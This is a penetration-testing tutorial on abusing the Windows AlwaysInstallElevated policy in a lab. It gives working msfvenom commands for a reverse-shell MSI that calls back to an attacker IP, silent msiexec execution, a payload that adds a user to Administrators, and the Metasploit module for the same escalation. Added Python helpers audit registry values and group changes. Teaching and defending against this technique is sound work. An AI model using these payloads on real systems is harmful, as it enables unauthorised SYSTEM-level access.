Windows Privilege Escalation (AlwaysInstallElevated)

Hello Friends!! In this article, we demonstrate Windows privilege escalation via the AlwaysInstallElevated policy. In penetration testing, once we have spawned a command shell as a local user, it is possible to exploit vulnerable features (or configuration settings) of Windows Group Policy to elevate that user to administrator privileges and gain administrator access.

Table of Contents

  • Introduction
  • Lab setup
  • Spawn command shell as local user
  • Escalate privilege manually via a .msi payload (Msfvenom)
  • Escalate privilege by adding the user to the Administrators group (Msfvenom)
  • Escalate privilege via a post-exploitation module (Metasploit)

Introduction

AlwaysInstallElevated Policy

As we are all aware, the Windows OS ships with the Windows Installer engine, which MSI packages use to install applications. These MSI packages can be installed with elevated privileges on behalf of non-admin users.

For this purpose, the AlwaysInstallElevated policy is used to install an MSI package file with elevated (SYSTEM) privileges. The policy is enabled in the Local Group Policy Editor; it directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This can make a machine vulnerable and poses a high security risk, because a non-administrator user can run installations with elevated privileges and thereby reach many protected locations on the computer.

Caution Note: This option is equivalent to granting full administrative rights, which poses a massive security risk. Microsoft strongly discourages the use of this setting. Hence it should be used for lab purposes only (and never in a production environment).

Lab set-up

Victim’s Machine: Windows 7

Attacker’s machine: Kali Linux

To make this policy effective [i.e. to install a package with elevated (SYSTEM) privileges], we need to ensure that the victim machine is deliberately made vulnerable by enabling the AlwaysInstallElevated policy in both the Computer Configuration and the User Configuration folders of the Local Group Policy Editor.

For the Windows configuration 

Type gpedit.msc in the Run dialog box of the Start Menu on the Windows 7 machine, and the Local Group Policy Editor window will open.

Change the settings of the AlwaysInstallElevated policy in both of the following locations.

For the Computer configuration

Navigate to the below path in the Windows machine

Computer Configuration\Administrative Templates\Windows Components\Windows Installer

Enable the "Always install with elevated privileges" setting

For the User configuration 

Navigate to the below path in the Windows machine

User Configuration\Administrative Templates\Windows Components\Windows Installer

Enable the "Always install with elevated privileges" setting

This completes the lab setup on the Windows machine. Now let’s proceed to our actual task.

Spawning Victim’s Machine

We need to compromise the Windows victim machine at least once to obtain a meterpreter session. As you can observe, we already have a meterpreter session on the victim. Let’s open msfconsole and check the existing sessions

msfconsole
sessions

As we can see, a session with ID 1 already exists. Now let’s open session 1 and extract the user details

msf > sessions 1
meterpreter > getuid

As we can see, we are logged into this session as the user raj.

Note: The user “raj” already exists on the Windows 7 victim machine and is a non-admin user


Now let’s open the command shell of the target machine

meterpreter > shell

Upon executing the shell command, we land in the user’s Downloads folder, C:\Users\raj\Downloads

We will now run the following registry queries in this command prompt to verify whether the Windows Installer has elevated privileges, as per the settings configured earlier

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

As we can see from the output, the registry value named “AlwaysInstallElevated” exists with a DWORD (REG_DWORD) value of 0x1, which means that the AlwaysInstallElevated policy is enabled.
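An added audit helper (not part of the original article) that parses the text printed by the two reg query commands above and decides whether the policy is actually in force. Windows Installer honours AlwaysInstallElevated only when the value is 1 under both the HKLM and HKCU policy keys, which is why the lab setup enables it in both Computer Configuration and User Configuration; the helper reports the per-hive value and flags the host only when both are set. The reg query output it consumes is constructed sample text, not a capture from the lab machine.

```python
"""Added example: decide from `reg query` output whether AlwaysInstallElevated
is effectively enabled on a host (both HKLM and HKCU must carry the value 1)."""
import re
from typing import Dict, Optional

# Constructed sample of what the two `reg query` commands print on the
# deliberately weakened lab machine (both policy keys present, value 0x1).
SAMPLE_BOTH_ENABLED = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# Constructed sample for a host where only the machine policy is set and the
# per-user key does not exist (reg query prints an error for the missing key).
SAMPLE_HKLM_ONLY = r"""
ERROR: The system was unable to find the specified registry key or value.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# A key line begins with a hive name; long and short forms are both accepted
# so output from `reg query HKLM\...` and `reg query HKEY_LOCAL_MACHINE\...` parse alike.
_HIVES = {
    "HKEY_LOCAL_MACHINE": "HKLM",
    "HKLM": "HKLM",
    "HKEY_CURRENT_USER": "HKCU",
    "HKCU": "HKCU",
}
_VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$", re.IGNORECASE
)


def parse_reg_query(text: str) -> Dict[str, Optional[int]]:
    """Map each policy hive to its AlwaysInstallElevated value, or None if absent."""
    values: Dict[str, Optional[int]] = {"HKLM": None, "HKCU": None}
    current: Optional[str] = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        hive_token = stripped.split("\\", 1)[0].upper()
        if "\\" in stripped and hive_token in _HIVES:
            current = _HIVES[hive_token]  # subsequent value lines belong to this hive
            continue
        match = _VALUE_RE.match(line)
        if match and current is not None:
            raw = match.group(1)
            values[current] = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
    return values


def is_policy_enabled(values: Dict[str, Optional[int]]) -> bool:
    """The Installer only elevates when BOTH hives carry the value 1."""
    return values["HKLM"] == 1 and values["HKCU"] == 1


def audit(reg_output: str) -> Dict[str, object]:
    """Produce a finding record suitable for a host-audit report."""
    values = parse_reg_query(reg_output)
    enabled = is_policy_enabled(values)
    return {
        "hklm": values["HKLM"],
        "hkcu": values["HKCU"],
        "enabled": enabled,
        "finding": (
            "AlwaysInstallElevated is in force: any user can install MSI packages as SYSTEM"
            if enabled
            else "AlwaysInstallElevated not in force (requires value 1 in both HKLM and HKCU)"
        ),
    }


if __name__ == "__main__":
    for label, sample in (("both hives", SAMPLE_BOTH_ENABLED), ("HKLM only", SAMPLE_HKLM_ONLY)):
        print(label, audit(sample))
```

Feed it the saved output of the two reg query commands from each host in an audit sweep; a host is only reported when both hives read 1, which avoids false positives on machines where an administrator set the computer policy but not the user policy.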

Privilege Escalation via .msi payload (1st Method)

Now let’s open a new terminal on the Kali machine and generate an MSI package file (1.msi) using the Windows Meterpreter payload as follows

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 -f msi > /root/Desktop/1.msi

From the existing Meterpreter session of the user, let’s upload our MSI file 1.msi to the target machine as follows. Once it is uploaded successfully, we will jump back into the shell

upload /root/Desktop/1.msi .

Note: Before executing the MSI package file, start an MSF handler in another terminal window (the commands for this are given after the screenshot below)

Execute the MSI package file on the Windows command prompt

msiexec /quiet /qn /i 1.msi


/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation

In a parallel window, we had opened a new handler before executing the .msi file

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.120
msf exploit(handler) > set lport 4567
msf exploit(handler) > exploit

Finally, we got a meterpreter session using this exploit!! Let’s have a further look at the privileges of the user we gained on this system

meterpreter > getsystem
meterpreter > getuid

Fantastic!! We are now running as the Local System account (NT AUTHORITY\SYSTEM), which has the highest level of privileges on the local system.


Adding user in Administrators Group (2nd Method)

In this method, we will choose a non-admin user from the existing list of users on the target machine and then try to elevate that user’s privileges. Here we send the relevant Windows command to the target machine using Metasploit’s windows/exec payload.

First, let us check the details of the existing users on the victim machine. Here we can select any user; let’s select the user named “raaz”, who is a non-admin user

net user

That the user “raaz” is in the local Users group can be verified by running the following in the command prompt

net user raaz


Generate an MSI package (2.msi) with the windows/exec payload that carries a command instructing the target machine to add the user “raaz” to the local Administrators group.

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f msi > /root/Desktop/2.msi

Now let’s upload the MSI file 2.msi to the target machine as follows

Note: Before uploading the MSI file, press Ctrl+Z to exit the victim machine’s command shell and return to meterpreter

In the meterpreter shell type

upload /root/Desktop/2.msi .

Once the MSI file is uploaded successfully, we will take the command shell and execute the installer file

shell
msiexec /quiet /qn /i 2.msi

That the user “raaz” has been added to the local Administrators group can be verified by running the following in the command prompt

net user raaz

As we can see from the screenshot, the user raaz is now a member of the local Administrators group

Awesome!! We have escalated the privileges of the non-admin user using this manual exploit.
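An added check (not from the original article) for the defender's side of this method: it reads the text printed by net user raaz before and after the installer ran, lists the account's local groups, and reports any group the account gained. A scheduled comparison of this kind against a baseline capture is how membership changes made outside the normal change process get noticed. Both net user captures in the block are constructed sample output, not the lab machine's.

```python
"""Added example: detect local Administrators membership (and drift from a
baseline) by parsing the text printed by `net user <name>`."""
import re
from typing import List, Set

# Constructed `net user raaz` output before the MSI ran: member of Users only.
BEFORE = """User name                    raaz
Full Name
Account active               Yes
Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
"""

# Constructed output after the MSI ran: now also in Administrators.  Long
# group lists wrap onto indented continuation lines, which the parser accepts.
AFTER = """User name                    raaz
Full Name
Account active               Yes
Local Group Memberships      *Administrators       *Users
                             *Remote Desktop Users
Global Group memberships     *None
The command completed successfully.
"""

_HEADER = "Local Group Memberships"


def local_groups(net_user_output: str) -> List[str]:
    """Return the local groups listed for the account, in printed order."""
    groups: List[str] = []
    in_section = False
    for line in net_user_output.splitlines():
        if line.startswith(_HEADER):
            in_section = True
            body = line[len(_HEADER):]
        elif in_section and line.startswith(" ") and "*" in line:
            body = line  # wrapped continuation of the group list
        else:
            if in_section:
                break  # next field reached (e.g. "Global Group memberships")
            continue
        # Each group is prefixed with '*' and padded with spaces; "*None" means no membership.
        for name in re.split(r"\s*\*", body):
            name = name.strip()
            if name and name != "None":
                groups.append(name)
    return groups


def is_local_admin(net_user_output: str) -> bool:
    """True when the account is a direct member of the local Administrators group."""
    return any(g.lower() == "administrators" for g in local_groups(net_user_output))


def group_drift(baseline_output: str, current_output: str) -> Set[str]:
    """Groups the account belongs to now but did not in the baseline capture."""
    return set(local_groups(current_output)) - set(local_groups(baseline_output))


if __name__ == "__main__":
    print("before:", local_groups(BEFORE), "admin:", is_local_admin(BEFORE))
    print("after: ", local_groups(AFTER), "admin:", is_local_admin(AFTER))
    print("new groups:", group_drift(BEFORE, AFTER))
```

Pair the output with the AlwaysInstallElevated registry audit: a host where the policy is in force and a standard account newly appears in Administrators is exactly the sequence this method produces.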


Privilege Escalation via Metasploit Post Exploit (3rd Method)

To perform privilege escalation by abusing the AlwaysInstallElevated policy, we can also use the built-in Metasploit module as follows:

Now let’s use this exploit

msf > use exploit/windows/local/always_install_elevated
msf exploit(always_install_elevated) > set session 1
msf exploit(always_install_elevated) > exploit

We got a meterpreter session using the built-in exploit as well!! Now let’s have a further look at the user privileges

meterpreter > getsystem
meterpreter > getuid

Hurrah!! We are now running as the Local System account (NT AUTHORITY\SYSTEM), which has the highest level of privileges on the local system

Note: We have shown one of the methodologies to elevate privileges. This lab can be performed in multiple ways, as there are many other methods of performing Windows privilege escalation.

Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing.

5 thoughts on “Windows Privilege Escalation (AlwaysInstallElevated)”

  1. I could do an article where privilege escalation with the service path will be explained without quotes
